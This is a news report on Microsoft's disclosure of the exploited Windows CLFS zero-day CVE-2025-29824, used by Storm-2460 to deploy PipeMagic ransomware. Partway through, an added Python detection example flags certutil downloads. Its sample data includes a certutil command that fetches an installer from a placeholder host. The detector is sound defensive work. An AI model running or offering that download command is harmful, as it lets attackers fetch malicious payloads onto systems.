Microsoft: CLFS Zero-Day Flaw Exploited in Ransomware Attacks

Ransomware attackers abused a zero-day flaw in a widely used Windows logging system for managing transactional information to launch attacks against organisations in the US real estate sector, Microsoft revealed Tuesday. 

In a blog post, the tech giant stated that the perpetrators employed a previously unknown flaw discovered in Windows' Common Log File System - a popular target for malicious actors seeking privilege escalation - to attack "a small number of targets," including American real estate firms, a Spanish software company, Venezuela's financial sector, and Saudi Arabia's retail sector. 

The flaw, identified as CVE-2025-29824, has a CVSS score of 7.8 and has been added to the Cybersecurity and Infrastructure Security Agency's "Known Exploited Vulnerabilities Catalogue". 

Microsoft stated that Storm-2460, a ransomware threat actor, used the flaw to deploy PipeMagic malware. In March, the firm patched a different bug in the Windows Win32 Kernel Subsystem that allowed attackers to escalate privileges to the system level, an exploit that researchers later linked to targeted attacks on Asian and Saudi organisations using a PipeMagic backdoor.

The tech behemoth said it "highly recommends organizations apply all available security updates for elevation of privilege flaws to add a layer of defense against ransomware attacks if threat actors are able to gain an initial foothold."

Microsoft noted that it has not yet determined how Storm-2460 gained access to the compromised devices, although it did observe that the group used the Windows certutil utility to download the malware from a legitimate third-party website it had previously compromised.
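The certutil download pattern described above is a common hunting lead. The following is an added example, not code from the original post or from Microsoft: a small Python check over constructed process-creation records (the field layout is an assumption loosely modelled on Sysmon Event ID 1, and the URL is a placeholder) that flags certutil.exe invocations carrying a URL argument or the -urlcache switch.

```python
import re
from typing import Dict, List

# Constructed sample process-creation records for this example (field layout is
# an assumption loosely modelled on Sysmon Event ID 1; the URL is a placeholder).
SAMPLE_EVENTS = [
    "ParentImage=C:\\Windows\\System32\\cmd.exe|Image=C:\\Windows\\System32\\certutil.exe|"
    "CommandLine=certutil.exe -urlcache -split -f https://compromised-site.example/u.msi C:\\Users\\Public\\u.msi",
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\certutil.exe|"
    "CommandLine=certutil.exe -hashfile C:\\Temp\\installer.exe SHA256",
    "ParentImage=C:\\Windows\\System32\\services.exe|Image=C:\\Windows\\System32\\svchost.exe|"
    "CommandLine=svchost.exe -k netsvcs",
]

URL_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)
# certutil switch that fetches a URL; certutil accepts both '-' and '/' prefixes.
DOWNLOAD_SWITCHES = {"urlcache"}


def parse_event(line: str) -> Dict[str, str]:
    """Split 'Key=Value|Key=Value' into a dict (split on the first '=' only)."""
    return dict(field.split("=", 1) for field in line.split("|"))


def is_certutil_download(event: Dict[str, str]) -> bool:
    """True when certutil.exe is invoked with a URL argument or a download switch."""
    image = event.get("Image", "").lower()
    if not image.endswith("\\certutil.exe"):
        return False
    argv = event.get("CommandLine", "").split()
    switches = {a[1:].lower() for a in argv if a[:1] in ("-", "/")}
    has_url = any(URL_RE.match(a) for a in argv)
    return has_url or bool(switches & DOWNLOAD_SWITCHES)


def find_certutil_downloads(lines: List[str]) -> List[str]:
    """Return the command lines of events that match the download pattern."""
    return [ev["CommandLine"] for ev in map(parse_event, lines) if is_certutil_download(ev)]


if __name__ == "__main__":
    for cmd in find_certutil_downloads(SAMPLE_EVENTS):
        print("certutil download:", cmd)
```

Legitimate administrative use of certutil (hash checks, certificate operations) is not flagged; only the fetch-from-URL form is, which is why the second sample record passes.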

Following the deployment of PipeMagic, the attackers used a technique that avoided writing data to disk, allowing them to launch the log system exploit directly in memory. In a security update posted on Tuesday, the company stated that users of Windows 11, version 24H2, "are not affected by the observed exploitation, even if the vulnerability was present."